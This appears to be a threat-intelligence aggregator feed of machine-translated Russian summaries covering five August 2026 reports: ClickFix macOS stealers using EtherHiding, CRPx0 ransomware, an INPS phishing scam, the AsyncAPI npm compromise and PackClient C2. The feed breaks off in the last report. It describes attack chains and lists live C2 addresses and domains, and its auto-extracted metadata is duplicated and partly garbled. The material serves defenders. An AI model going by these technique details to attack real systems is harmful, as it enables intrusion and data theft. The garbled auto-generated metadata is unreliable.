CTT Report Hub
#ParsedReport #CompletenessHigh 27-08-2026 Anatomy of a macOS ClickFix Crimekit that Weaponises EtherHiding https://notes.netbytesec.com/2026/08/anatomy-of-macos-clickfix-crimekit-that.html Report completeness: High Threats: Clickfix_technique Etherhiding_technique…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Кампания macOS ClickFix использовала поддельные CAPTCHA для доставки загрузчика в оперативной памяти, который обеспечивал закрепление (persistence) через LaunchAgent. Загрузчик резолвил домены C2 посредством вызовов смарт-контрактов Polygon, после чего развертывал варианты AMOS для кражи данных из браузеров, Связки ключей, кошельков, Телеграм и файлов. Отдельные полезны нагрузки устанавливали XMRig для майнинга криптовалюты, а украденные архивы загружались через HTTP или сайт для загрузки файлов.
-----
В июле 2026 года в кампании ClickFix для macOS использовалась поддельная CAPTCHA, размещенная на Cloudflare Pages, чтобы заставить жертв скопировать и выполнить команду в Терминале. Команда использовала конвейер `curl \| bash` для получения кода из Cloudflare Worker и его выполнения в памяти. Полезная нагрузка вызывала `/usr/bin/osascript` для запуска многоуровневого AppleScript, закодированного в base64. Скрипт создавал и загружал LaunchAgent для macOS, обеспечивая закрепление (persistence) и устанавливая загрузчик следующего этапа.
Загрузчик использовал обфускацию на основе идентификаторов символов и обращался к нескольким публичным RPC-эндпоинтам сети Polygon. Он выполнял запрос `eth_call` только для чтения к смарт-контракту для получения текущего имени хоста управления, что является техникой EtherHiding, предотвращающей прямое появление домена C2 в ВПО. Контракт хранил имя хоста в виде строки, а оператор изменял его с помощью транзакций `setServerURL`. Таким образом, история транзакций блокчейна раскрывала предыдущие домены C2 и обеспечивала постоянный идентификатор для мониторинга кошелька оператора и контракта.
Загрузчик получил постоянный бэкдор с именем `bmodule`, который управлял скомпрометированным Mac и загружал дополнительные полезныe нагрузки. Основной полезной нагрузкой `smodule` являлся вариант Atomic macOS Stealer (AMOS), нацеленный на данные браузеров, содержимое Связки ключей, кошельки криптовалют, хранилища расширений браузеров, сессии Телеграм и другие файлы пользователей. Более лёгкий вариант `lmodule` использовал аналогичную логику сбора данных, но исключал модули Apple Notes, куки Safari и FileGrabber. Украденные данные сжимались с помощью утилиты macOS `ditto` и загружались с использованием `curl`.
Отдельная полезная нагрузка, идентифицированная как `ledger` и `xmr`, развернула XMRig версии 6.26.0. Скрипт определял архитектуру Apple Silicon или Intel, загружал майнер с GitHub, удалял атрибут `com.apple.quarantine` и запускал его. Это приводило к устойчивому потреблению CPU и связанным с этим последствиям для производительности, заряда батареи и теплового режима. Эксфильтрация использовала маршрутизацию на основе размера: более крупные архивы отправлялись по незашифрованному HTTP на `62.60.226.0`, тогда как более мелкие коллекции загружались на `hf98x4d.site/upload.php`. ВПО также обращалась к `api.ipify.org` для получения публичного IP-адреса жертвы.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Кампания macOS ClickFix использовала поддельные CAPTCHA для доставки загрузчика в оперативной памяти, который обеспечивал закрепление (persistence) через LaunchAgent. Загрузчик резолвил домены C2 посредством вызовов смарт-контрактов Polygon, после чего развертывал варианты AMOS для кражи данных из браузеров, Связки ключей, кошельков, Телеграм и файлов. Отдельные полезны нагрузки устанавливали XMRig для майнинга криптовалюты, а украденные архивы загружались через HTTP или сайт для загрузки файлов.
-----
В июле 2026 года в кампании ClickFix для macOS использовалась поддельная CAPTCHA, размещенная на Cloudflare Pages, чтобы заставить жертв скопировать и выполнить команду в Терминале. Команда использовала конвейер `curl \| bash` для получения кода из Cloudflare Worker и его выполнения в памяти. Полезная нагрузка вызывала `/usr/bin/osascript` для запуска многоуровневого AppleScript, закодированного в base64. Скрипт создавал и загружал LaunchAgent для macOS, обеспечивая закрепление (persistence) и устанавливая загрузчик следующего этапа.
Загрузчик использовал обфускацию на основе идентификаторов символов и обращался к нескольким публичным RPC-эндпоинтам сети Polygon. Он выполнял запрос `eth_call` только для чтения к смарт-контракту для получения текущего имени хоста управления, что является техникой EtherHiding, предотвращающей прямое появление домена C2 в ВПО. Контракт хранил имя хоста в виде строки, а оператор изменял его с помощью транзакций `setServerURL`. Таким образом, история транзакций блокчейна раскрывала предыдущие домены C2 и обеспечивала постоянный идентификатор для мониторинга кошелька оператора и контракта.
Загрузчик получил постоянный бэкдор с именем `bmodule`, который управлял скомпрометированным Mac и загружал дополнительные полезныe нагрузки. Основной полезной нагрузкой `smodule` являлся вариант Atomic macOS Stealer (AMOS), нацеленный на данные браузеров, содержимое Связки ключей, кошельки криптовалют, хранилища расширений браузеров, сессии Телеграм и другие файлы пользователей. Более лёгкий вариант `lmodule` использовал аналогичную логику сбора данных, но исключал модули Apple Notes, куки Safari и FileGrabber. Украденные данные сжимались с помощью утилиты macOS `ditto` и загружались с использованием `curl`.
Отдельная полезная нагрузка, идентифицированная как `ledger` и `xmr`, развернула XMRig версии 6.26.0. Скрипт определял архитектуру Apple Silicon или Intel, загружал майнер с GitHub, удалял атрибут `com.apple.quarantine` и запускал его. Это приводило к устойчивому потреблению CPU и связанным с этим последствиям для производительности, заряда батареи и теплового режима. Эксфильтрация использовала маршрутизацию на основе размера: более крупные архивы отправлялись по незашифрованному HTTP на `62.60.226.0`, тогда как более мелкие коллекции загружались на `hf98x4d.site/upload.php`. ВПО также обращалась к `api.ipify.org` для получения публичного IP-адреса жертвы.
#ParsedReport #CompletenessHigh
27-08-2026
CRPx0 ClickFix Ransomware Analysis
https://ransom-isac.org/blog/crpx0-clickfix-ransomware-analysis/
Report completeness: High
Actors/Campaigns:
Harvester
Threats:
Crpx0
Clickfix_technique
Vssadmin_tool
Shadow_copies_delete_technique
Fodhelper_uac_bypass_technique
Clipboard_hijacking_technique
Process_injection_technique
Dll_sideloading_technique
Api_hammering_technique
Process_hacker_tool
Uac_bypass_technique
Burntcigar
Antidebugging_technique
Launchagents_tool
Edr-killer
Av-killer
Nltest_tool
Qtox_tool
Smuggling_technique
Bitsadmin_tool
Api_unhooking_technique
Inc_ransomware
Victims:
Healthcare, Financial services, Technology, Media, Nonprofit organisations
Industry:
Financial, Healthcare
Geo:
Turkish, South korean, Russian, Turkey, South korea
TTPs:
Tactics: 12
Technics: 37
IOCs:
File: 144
Domain: 6
IP: 4
Url: 4
Command: 7
Hash: 28
Registry: 1
Soft:
macOS, curl, Linux, Telegram, Mac OS, acOS, l \ ba, acOS co, acOS →, l dow, have more...
Wallets:
bybit, coinbase, tron, metamask
Crypto:
bitcoin, monero, ethereum, solana
Algorithms:
aes-128-cbc, zip, aes-256, rsa-2048, rsa-4096, xor, aes-128, aes, md5, base64, sha256
Functions:
__dp, detectOS, getHelloWorldMessage, reportClick, silentCopy, detectLanguage, getDocumentName, enterFullscreen, showAttention, handleKioskClick, have more...
Win API:
LoadLibrary, VariantInit, GetProcAddress, VirtualProtect, CreateFileA, CreateThread, VirtualAlloc, WriteFile, GetTempPathA, GetSystemDirectoryA, have more...
Win Services:
MsMpEng, AvastSvc, ekrn, rtvscan, mcshield, masvc, SavService, swi_service, WinDefend, WdNisSvc, have more...
Languages:
cpython, php, java, cscript, javascript, applescript, python, vbscript, powershell
Platforms:
x86, cross-platform, apple, arm, x64, intel
YARA: Found
SIGMA: Found
27-08-2026
CRPx0 ClickFix Ransomware Analysis
https://ransom-isac.org/blog/crpx0-clickfix-ransomware-analysis/
Report completeness: High
Actors/Campaigns:
Harvester
Threats:
Crpx0
Clickfix_technique
Vssadmin_tool
Shadow_copies_delete_technique
Fodhelper_uac_bypass_technique
Clipboard_hijacking_technique
Process_injection_technique
Dll_sideloading_technique
Api_hammering_technique
Process_hacker_tool
Uac_bypass_technique
Burntcigar
Antidebugging_technique
Launchagents_tool
Edr-killer
Av-killer
Nltest_tool
Qtox_tool
Smuggling_technique
Bitsadmin_tool
Api_unhooking_technique
Inc_ransomware
Victims:
Healthcare, Financial services, Technology, Media, Nonprofit organisations
Industry:
Financial, Healthcare
Geo:
Turkish, South korean, Russian, Turkey, South korea
TTPs:
Tactics: 12
Technics: 37
IOCs:
File: 144
Domain: 6
IP: 4
Url: 4
Command: 7
Hash: 28
Registry: 1
Soft:
macOS, curl, Linux, Telegram, Mac OS, acOS, l \ ba, acOS co, acOS →, l dow, have more...
Wallets:
bybit, coinbase, tron, metamask
Crypto:
bitcoin, monero, ethereum, solana
Algorithms:
aes-128-cbc, zip, aes-256, rsa-2048, rsa-4096, xor, aes-128, aes, md5, base64, sha256
Functions:
__dp, detectOS, getHelloWorldMessage, reportClick, silentCopy, detectLanguage, getDocumentName, enterFullscreen, showAttention, handleKioskClick, have more...
Win API:
LoadLibrary, VariantInit, GetProcAddress, VirtualProtect, CreateFileA, CreateThread, VirtualAlloc, WriteFile, GetTempPathA, GetSystemDirectoryA, have more...
Win Services:
MsMpEng, AvastSvc, ekrn, rtvscan, mcshield, masvc, SavService, swi_service, WinDefend, WdNisSvc, have more...
Languages:
cpython, php, java, cscript, javascript, applescript, python, vbscript, powershell
Platforms:
x86, cross-platform, apple, arm, x64, intel
YARA: Found
SIGMA: Found
Ransom-ISAC
CRPx0 ClickFix Ransomware Analysis
A ClickFix-delivered ransomware-as-a-service operation, traced from lure page to cross-platform Python ransomware with detections and IOCs.
CTT Report Hub
#ParsedReport #CompletenessHigh 27-08-2026 CRPx0 ClickFix Ransomware Analysis https://ransom-isac.org/blog/crpx0-clickfix-ransomware-analysis/ Report completeness: High Actors/Campaigns: Harvester Threats: Crpx0 Clickfix_technique Vssadmin_tool Shado…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
CRPx0 — это межплатформенная операция по модели «Программа-вымогатель как услуга», использующая приманки ClickFix, чтобы заставить жертв выполнять вредоносные команды. Её полезная нагрузка устанавливает обфусцированную программу-вымогатель на Python, уклоняется от анализа, крадёт конфиденциальные файлы, отключает средства защиты и резервные копии, поддерживает перемещение внутри компании, после чего шифрует файлы и выводит данные, добавляя расширение `.crpx0`.
-----
CRPx0 — это операция по модели «Программа-вымогатель как услуга», использующая социальную инженерию ClickFix для доставки кроссплатформенного шифровальщика. Ловушки для Windows и macOS имитируют системные обновления или проверку reCAPTCHA. Страницы определяют операционную систему, незаметно копируют вредоносную команду в буфер обмена и инструктируют жертву вставить её в окно «Выполнить» Windows или в Терминал macOS. Команды для Windows запускают PowerShell и цепочку DLL; команды для macOS используют `curl\|bash` для загрузки портативной версии Python и самого шифровальщика. Также существуют автономные варианты в форматах DLL и EXE, которые обходят этап ClickFix.
В Windows встроенная или доставляемая стейджер-библиотека DLL использует ключи XOR, уникальные для каждой сборки, а также многослойный алгоритм, включающий операции XOR, циклический сдвиг и побитовое отрицание, для расшифровки второй библиотеки DLL. Загрузчик создаёт временные каталоги для промежуточного размещения, загружает встроенный интерпретатор Python, извлекает его с помощью `tar.exe` или COM-объекта `Shell.Application` и выполняет обфусцированный Python-бутстрап. Бутстрап использует `base64` и `zlib` для распаковки шифровальщика `sys_service.py` размером около 3,9 МБ. В macOS используются временные файлы, такие как `/tmp/py.tar.gz`, `/tmp/python/` и `/tmp/sys_service.py`.
Финальный полезный код выполняет проверки на наличие средств анализа, включая оценку времени выполнения в песочнице, проверку MAC-адресов виртуальных машин, проверку подозрительных файлов и имен пользователей, а также обнаружение точек останова. В среде Windows он может обходить UAC с помощью перехвата реестра `ms-settings` на уровне пользователя и использования `fodhelper.exe`, обеспечивать закрепление (persistence) с помощью запланированных задач, стилизованных под OneDrive, завершать работу средств защиты и уничтожать резервные копии с помощью `vssadmin`, WMIC и `wbadmin`. Варианты для macOS и Linux используют LaunchAgents или эквивалентные механизмы и удаляют локальные снимки.
CRPx0 сканирует диски и домашние каталоги, собирает офисные документы и файлы, связанные с учётными данными, упаковывает их в ZIP-архив и выгружает его в виде многочастной загрузки блоками по 512 КБ до начала шифрования. Затем он шифрует первый мегабайт целевых файлов с помощью Fernet на базе AES-128-CBC, оборачивает ключ для каждой жертвы с использованием RSA-4096 OAEP, добавляет расширение `.crpx0` и удаляет исходные файлы. Перемещение внутри компании осуществляется с помощью административных шар, WMI, удалённых запланированных задач, GPO/SYSVOL или SSH. Приоритетные направления обнаружения включают записи RunMRU, содержащие скрытые команды PowerShell или curl, заголовок `X-Captcha-Track: 1`, подозрительную активность по подготовке и закреплению, удаление резервных копий, а также аутентифицированные загрузки на `relay.php`. Анализ основывался на исходном коде и дизассемблировании; поведение и правила обнаружения не были полностью верифицированы путём выполнения.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
CRPx0 — это межплатформенная операция по модели «Программа-вымогатель как услуга», использующая приманки ClickFix, чтобы заставить жертв выполнять вредоносные команды. Её полезная нагрузка устанавливает обфусцированную программу-вымогатель на Python, уклоняется от анализа, крадёт конфиденциальные файлы, отключает средства защиты и резервные копии, поддерживает перемещение внутри компании, после чего шифрует файлы и выводит данные, добавляя расширение `.crpx0`.
-----
CRPx0 — это операция по модели «Программа-вымогатель как услуга», использующая социальную инженерию ClickFix для доставки кроссплатформенного шифровальщика. Ловушки для Windows и macOS имитируют системные обновления или проверку reCAPTCHA. Страницы определяют операционную систему, незаметно копируют вредоносную команду в буфер обмена и инструктируют жертву вставить её в окно «Выполнить» Windows или в Терминал macOS. Команды для Windows запускают PowerShell и цепочку DLL; команды для macOS используют `curl\|bash` для загрузки портативной версии Python и самого шифровальщика. Также существуют автономные варианты в форматах DLL и EXE, которые обходят этап ClickFix.
В Windows встроенная или доставляемая стейджер-библиотека DLL использует ключи XOR, уникальные для каждой сборки, а также многослойный алгоритм, включающий операции XOR, циклический сдвиг и побитовое отрицание, для расшифровки второй библиотеки DLL. Загрузчик создаёт временные каталоги для промежуточного размещения, загружает встроенный интерпретатор Python, извлекает его с помощью `tar.exe` или COM-объекта `Shell.Application` и выполняет обфусцированный Python-бутстрап. Бутстрап использует `base64` и `zlib` для распаковки шифровальщика `sys_service.py` размером около 3,9 МБ. В macOS используются временные файлы, такие как `/tmp/py.tar.gz`, `/tmp/python/` и `/tmp/sys_service.py`.
Финальный полезный код выполняет проверки на наличие средств анализа, включая оценку времени выполнения в песочнице, проверку MAC-адресов виртуальных машин, проверку подозрительных файлов и имен пользователей, а также обнаружение точек останова. В среде Windows он может обходить UAC с помощью перехвата реестра `ms-settings` на уровне пользователя и использования `fodhelper.exe`, обеспечивать закрепление (persistence) с помощью запланированных задач, стилизованных под OneDrive, завершать работу средств защиты и уничтожать резервные копии с помощью `vssadmin`, WMIC и `wbadmin`. Варианты для macOS и Linux используют LaunchAgents или эквивалентные механизмы и удаляют локальные снимки.
CRPx0 сканирует диски и домашние каталоги, собирает офисные документы и файлы, связанные с учётными данными, упаковывает их в ZIP-архив и выгружает его в виде многочастной загрузки блоками по 512 КБ до начала шифрования. Затем он шифрует первый мегабайт целевых файлов с помощью Fernet на базе AES-128-CBC, оборачивает ключ для каждой жертвы с использованием RSA-4096 OAEP, добавляет расширение `.crpx0` и удаляет исходные файлы. Перемещение внутри компании осуществляется с помощью административных шар, WMI, удалённых запланированных задач, GPO/SYSVOL или SSH. Приоритетные направления обнаружения включают записи RunMRU, содержащие скрытые команды PowerShell или curl, заголовок `X-Captcha-Track: 1`, подозрительную активность по подготовке и закреплению, удаление резервных копий, а также аутентифицированные загрузки на `relay.php`. Анализ основывался на исходном коде и дизассемблировании; поведение и правила обнаружения не были полностью верифицированы путём выполнения.
#ParsedReport #CompletenessLow
25-08-2026
New phishing campaign targeting INPS: fake refund for “recalculation of tax contributions”
https://cert-agid.gov.it/news/phishing-ai-danni-di-inps-falso-rimborso-per-ricalcolo-contributi-fiscali/
Report completeness: Low
Victims:
National social security institute, Social security sector, Tax sector, Banking sector
Industry:
Financial
ChatGPT TTPs:
T1036.005, T1056.003, T1566.002, T1608.005, T1656, T1657
IOCs:
Domain: 2
Url: 7
Algorithms:
zip
25-08-2026
New phishing campaign targeting INPS: fake refund for “recalculation of tax contributions”
https://cert-agid.gov.it/news/phishing-ai-danni-di-inps-falso-rimborso-per-ricalcolo-contributi-fiscali/
Report completeness: Low
Victims:
National social security institute, Social security sector, Tax sector, Banking sector
Industry:
Financial
ChatGPT TTPs:
do not use without manual checkT1036.005, T1056.003, T1566.002, T1608.005, T1656, T1657
IOCs:
Domain: 2
Url: 7
Algorithms:
zip
CERT-AGID
Nuova campagna di phishing ai danni di INPS: falso rimborso per “ricalcolo contributi fiscali”
Il CERT-AGID ha individuato una campagna di phishing diffusa tramite email che utilizza nome, logo e grafica dell’INPS per sottrarre dati personali, coordinate delle carte di pagamento e indurre le vittime ad autorizzare operazioni bancarie.
La leva impiegata…
La leva impiegata…
CTT Report Hub
#ParsedReport #CompletenessLow 25-08-2026 New phishing campaign targeting INPS: fake refund for “recalculation of tax contributions” https://cert-agid.gov.it/news/phishing-ai-danni-di-inps-falso-rimborso-per-ricalcolo-contributi-fiscali/ Report completeness:…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
CERT-AGID выявил фишинговую кампанию, использующую тематику INPS и обещавшую возврат 730 евро через мошеннический веб-сайт. Сайт собирает персональные данные и данные платежных карт, а затем использует поддельное окно авторизации 3D Secure, чтобы заставить жертв одобрить несанкционированные банковские операции.
-----
CERT-AGID выявил фишинговую кампанию, имитирующую Национальный институт социального страхования Италии (INPS). Кампания распространяется по электронной почте и утверждает, что получатель имеет право на возврат в размере 730 евро, полученный в результате автоматического пересчета его социальных взносов и налоговых отчислений. В сообщениях используются фирменный стиль, логотипы и графика INPS, чтобы придать им видимость подлинности, а получателей направляют на мошеннический сайт по возврату средств.
Ссылка ведёт на **feedsafepro[.\]com**, домен, не имеющий отношения к INPS. Сайт воспроизводит внешний вид официального институционального портала и представляет взаимодействие как многоэтапную заявку на возврат средств, связанную с формой 730/2026. Сначала собираются обширные персональные данные, идентифицирующие личность, включая имя жертвы, налоговый код, дату рождения, адрес, муниципалитет, провинцию, почтовый индекс, адрес электронной почты и номер телефона.
На втором этапе запрашиваются данные банковской карты, включая имя держателя карты, номер карты, срок действия и CVV. Для повышения доверия мошеннический сайт содержит ссылки на TLS 1.3, PCI-DSS, GDPR и защищенные соединения, хотя эти утверждения не подтверждают легитимность сервиса.
После отправки данных жертва видит сфабрикованный экран «Идёт авторизация банка по протоколу 3D Secure 2.2». Ей предлагается открыть банковское приложение и подтвердить push-уведомление в течение 60 секунд. Эта процедура направлена на то, чтобы заставить жертву завершить процедуру сильной аутентификации клиента для несанкционированной банковской операции, а не для авторизации законного возврата средств. Таким образом, данная кампания сочетает в себе кражу данных личности, сбор данных платёжных карт и социальную инженерию, направленную на получение одобрения мошеннических транзакций.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
CERT-AGID выявил фишинговую кампанию, использующую тематику INPS и обещавшую возврат 730 евро через мошеннический веб-сайт. Сайт собирает персональные данные и данные платежных карт, а затем использует поддельное окно авторизации 3D Secure, чтобы заставить жертв одобрить несанкционированные банковские операции.
-----
CERT-AGID выявил фишинговую кампанию, имитирующую Национальный институт социального страхования Италии (INPS). Кампания распространяется по электронной почте и утверждает, что получатель имеет право на возврат в размере 730 евро, полученный в результате автоматического пересчета его социальных взносов и налоговых отчислений. В сообщениях используются фирменный стиль, логотипы и графика INPS, чтобы придать им видимость подлинности, а получателей направляют на мошеннический сайт по возврату средств.
Ссылка ведёт на **feedsafepro[.\]com**, домен, не имеющий отношения к INPS. Сайт воспроизводит внешний вид официального институционального портала и представляет взаимодействие как многоэтапную заявку на возврат средств, связанную с формой 730/2026. Сначала собираются обширные персональные данные, идентифицирующие личность, включая имя жертвы, налоговый код, дату рождения, адрес, муниципалитет, провинцию, почтовый индекс, адрес электронной почты и номер телефона.
На втором этапе запрашиваются данные банковской карты, включая имя держателя карты, номер карты, срок действия и CVV. Для повышения доверия мошеннический сайт содержит ссылки на TLS 1.3, PCI-DSS, GDPR и защищенные соединения, хотя эти утверждения не подтверждают легитимность сервиса.
После отправки данных жертва видит сфабрикованный экран «Идёт авторизация банка по протоколу 3D Secure 2.2». Ей предлагается открыть банковское приложение и подтвердить push-уведомление в течение 60 секунд. Эта процедура направлена на то, чтобы заставить жертву завершить процедуру сильной аутентификации клиента для несанкционированной банковской операции, а не для авторизации законного возврата средств. Таким образом, данная кампания сочетает в себе кражу данных личности, сбор данных платёжных карт и социальную инженерию, направленную на получение одобрения мошеннических транзакций.
#ParsedReport #CompletenessLow
27-08-2026
Inside the AsyncAPI Supply Chain Compromise
https://www.cyberproof.com/blog/inside-the-asyncapi-supply-chain-compromise/
Report completeness: Low
Threats:
Supply_chain_technique
Victims:
Asyncapi, Software developers, Ci/cd environments
TTPs:
Tactics: 1
Technics: 0
ChatGPT TTPs:
T1027, T1059.007, T1105, T1195.002
IOCs:
File: 4
IP: 2
Url: 2
Hash: 3
Domain: 0
Email: 0
BrowserExtension: 0
Soft:
Node.js
Algorithms:
sha256
Languages:
javascript
27-08-2026
Inside the AsyncAPI Supply Chain Compromise
https://www.cyberproof.com/blog/inside-the-asyncapi-supply-chain-compromise/
Report completeness: Low
Threats:
Supply_chain_technique
Victims:
Asyncapi, Software developers, Ci/cd environments
TTPs:
Tactics: 1
Technics: 0
ChatGPT TTPs:
do not use without manual checkT1027, T1059.007, T1105, T1195.002
IOCs:
File: 4
IP: 2
Url: 2
Hash: 3
Domain: 0
Email: 0
BrowserExtension: 0
Soft:
Node.js
Algorithms:
sha256
Languages:
javascript
CyberProof
Inside the AsyncAPI Supply Chain Compromise
Contributors: Archana Manoharan, Mohsina Farooqui, Meenakshi Babu, Philip Kanthappally Executive Summary In July 2026, Microsoft Threat Intelligence
CTT Report Hub
#ParsedReport #CompletenessLow 27-08-2026 Inside the AsyncAPI Supply Chain Compromise https://www.cyberproof.com/blog/inside-the-asyncapi-supply-chain-compromise/ Report completeness: Low Threats: Supply_chain_technique Victims: Asyncapi, Software developers…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
В июле 2026 года злоумышленники скомпрометировали организацию AsyncAPI в реестре NPM и распространили вредоносные версии пакетов, которые выполнялись во время сборки. Пакеты доставляли файл `sync.js` через IPFS, обеспечивали закрепление в системе и функционировали как троянская программа, взаимодействующая с внешней инфраструктурой C2, в том числе с адресом `85.137.53.71`, нацеливаясь на среды разработки и CI/CD.
-----
В июле 2026 года злоумышленники осуществили компрометацию официальной организации AsyncAPI в реестре NPM и опубликовали вредоносные версии пакетов в рамках доверенного пространства имён. Операция была направлена на среды разработки и конвейеры сборки путём внедрения вредоносных хуков жизненного цикла в пакеты, имитирующие легитимные. По имеющимся данным, компрометация включала выполнение задачи сборки схемы `xc`, которая вызывала `@asyncapi/html-template@3.5.5`, при этом инструментальные цепочки, использующие `npx`, могли получить затронутую цепочку зависимостей в ходе рутинных сборок.
При выполнении скомпрометированного пакета обфусцированный скрипт на JavaScript выступал в роли дроппера. Он скачивал полезную нагрузку второго этапа с именем `sync.js` с IPFS-шлюза, сохранял файл в локальном каталоге данных приложения Node.js пользователя и запускал его как отсоединённый фоновый процесс. ВПО обеспечивала закрепление посредством локальных механизмов автозагрузки, включая профили инициализации оболочки и другие элементы автозагрузки, и функционировала как многоэтапная троянская программа удалённого доступа.
Полезная нагрузка взаимодействовала с внешней инфраструктурой управления, включая IP-адрес `85.137.53.71`, при этом для получения дополнительных компонентов использовалось содержимое, размещенное на IPFS. Телеметрия хоста зафиксировала 291 уникальную попытку воздействия, инициированную ВПО. Использование доверенных имен пакетов, зависимостей разработчика, автоматизации сборки, децентрализованного размещения полезной нагрузки и механизмов закрепления позволило злоумышленникам перемещаться в средах разработки и CI/CD, снижая зависимость от традиционных методов распространения ВПО.
К рекомендуемым мерам реагирования относятся изоляция затронутых конечных точек, блокировка выявленного адреса C2 и вредоносных ресурсов IPFS, удаление файла `sync.js` и связанных временных артефактов, а также проверка файлов `.zshrc`, `.bashrc`, элементов автозагрузки и других мест закрепления. Организациям следует провести аудит репозиториев, систем сборки и версий пакетов на предмет наличия затронутых зависимостей; обеспечить использование файлов блокировки версий (lockfiles) и криптографическую проверку целостности пакетов; избегать динамического, нефиксированного получения пакетов через `npx` в автоматизированных конвейерах; а также выполнить ротацию учетных данных, токенов, API-ключей и секретов, доступных из скомпрометированных систем.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
В июле 2026 года злоумышленники скомпрометировали организацию AsyncAPI в реестре NPM и распространили вредоносные версии пакетов, которые выполнялись во время сборки. Пакеты доставляли файл `sync.js` через IPFS, обеспечивали закрепление в системе и функционировали как троянская программа, взаимодействующая с внешней инфраструктурой C2, в том числе с адресом `85.137.53.71`, нацеливаясь на среды разработки и CI/CD.
-----
В июле 2026 года злоумышленники осуществили компрометацию официальной организации AsyncAPI в реестре NPM и опубликовали вредоносные версии пакетов в рамках доверенного пространства имён. Операция была направлена на среды разработки и конвейеры сборки путём внедрения вредоносных хуков жизненного цикла в пакеты, имитирующие легитимные. По имеющимся данным, компрометация включала выполнение задачи сборки схемы `xc`, которая вызывала `@asyncapi/html-template@3.5.5`, при этом инструментальные цепочки, использующие `npx`, могли получить затронутую цепочку зависимостей в ходе рутинных сборок.
При выполнении скомпрометированного пакета обфусцированный скрипт на JavaScript выступал в роли дроппера. Он скачивал полезную нагрузку второго этапа с именем `sync.js` с IPFS-шлюза, сохранял файл в локальном каталоге данных приложения Node.js пользователя и запускал его как отсоединённый фоновый процесс. ВПО обеспечивала закрепление посредством локальных механизмов автозагрузки, включая профили инициализации оболочки и другие элементы автозагрузки, и функционировала как многоэтапная троянская программа удалённого доступа.
Полезная нагрузка взаимодействовала с внешней инфраструктурой управления, включая IP-адрес `85.137.53.71`, при этом для получения дополнительных компонентов использовалось содержимое, размещенное на IPFS. Телеметрия хоста зафиксировала 291 уникальную попытку воздействия, инициированную ВПО. Использование доверенных имен пакетов, зависимостей разработчика, автоматизации сборки, децентрализованного размещения полезной нагрузки и механизмов закрепления позволило злоумышленникам перемещаться в средах разработки и CI/CD, снижая зависимость от традиционных методов распространения ВПО.
К рекомендуемым мерам реагирования относятся изоляция затронутых конечных точек, блокировка выявленного адреса C2 и вредоносных ресурсов IPFS, удаление файла `sync.js` и связанных временных артефактов, а также проверка файлов `.zshrc`, `.bashrc`, элементов автозагрузки и других мест закрепления. Организациям следует провести аудит репозиториев, систем сборки и версий пакетов на предмет наличия затронутых зависимостей; обеспечить использование файлов блокировки версий (lockfiles) и криптографическую проверку целостности пакетов; избегать динамического, нефиксированного получения пакетов через `npx` в автоматизированных конвейерах; а также выполнить ротацию учетных данных, токенов, API-ключей и секретов, доступных из скомпрометированных систем.
#ParsedReport #CompletenessHigh
27-08-2026
[Op Report\] PackClient: Hands-on-Keyboard with a new C2 Framework
https://blog.deception.pro/blog/new-packclient-hok-aug2026
Report completeness: High
Actors/Campaigns:
Ta4922
Threats:
Packclient
Donut
Packclientlauncher
Packclientcore
Process_hollowing_technique
Wevtutil_tool
Shadow_copies_delete_technique
Motw_bypass_technique
Lolbin_technique
Bitsadmin_tool
Spear-phishing_technique
Process_injection_technique
Uac_bypass_technique
Victims:
Physical security, Critical infrastructure
Industry:
Critical_infrastructure, Ics
Geo:
Chinese, Indian, India, Germany
TTPs:
Tactics: 2
Technics: 23
IOCs:
File: 35
IP: 9
Domain: 2
Url: 2
Command: 9
Path: 13
Coin: 1
Hash: 8
Registry: 2
Soft:
Active Directory, curl, BitLocker, Telegram, Windows Installer
Algorithms:
zip, sha256
Win API:
EXE
Win Services:
DCAgent
Languages:
java, vbscript, visual_basic
Platforms:
x64, x86
27-08-2026
[Op Report\] PackClient: Hands-on-Keyboard with a new C2 Framework
https://blog.deception.pro/blog/new-packclient-hok-aug2026
Report completeness: High
Actors/Campaigns:
Ta4922
Threats:
Packclient
Donut
Packclientlauncher
Packclientcore
Process_hollowing_technique
Wevtutil_tool
Shadow_copies_delete_technique
Motw_bypass_technique
Lolbin_technique
Bitsadmin_tool
Spear-phishing_technique
Process_injection_technique
Uac_bypass_technique
Victims:
Physical security, Critical infrastructure
Industry:
Critical_infrastructure, Ics
Geo:
Chinese, Indian, India, Germany
TTPs:
Tactics: 2
Technics: 23
IOCs:
File: 35
IP: 9
Domain: 2
Url: 2
Command: 9
Path: 13
Coin: 1
Hash: 8
Registry: 2
Soft:
Active Directory, curl, BitLocker, Telegram, Windows Installer
Algorithms:
zip, sha256
Win API:
EXE
Win Services:
DCAgent
Languages:
java, vbscript, visual_basic
Platforms:
x64, x86
Deception.Pro Blog
[Op Report] PackClient: Hands-on-Keyboard with a new C2 Framework — Deception.Pro Blog
Over a 48-hour Deception.Pro operation, we watched a PackClient operator use a tax-themed RAT as a doorman: after hours of quiet beaconing, a hands-on-keyboard task chain suppressed UAC and silently enrolled the victim into a ManageEngine Endpoint Central…
CTT Report Hub
#ParsedReport #CompletenessHigh 27-08-2026 [Op Report\] PackClient: Hands-on-Keyboard with a new C2 Framework https://blog.deception.pro/blog/new-packclient-hok-aug2026 Report completeness: High Actors/Campaigns: Ta4922 Threats: Packclient Donut Packclientlauncher…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
TA4922 использовал RAT PackClient в атаке с тематикой налогообложения, обеспечив закрепление (persistence) посредством замаскированной запланированной задачи и внедрения в пустой процесс (Process Hollowing). Актор отключил UAC, загрузил инструменты и установил компоненты ManageEngine Endpoint Central/UEMS для проведения обнаружения хостов, перечисления объектов Active Directory, сканирования и удаленного управления, маскируясь под легитимную административную активность.
-----
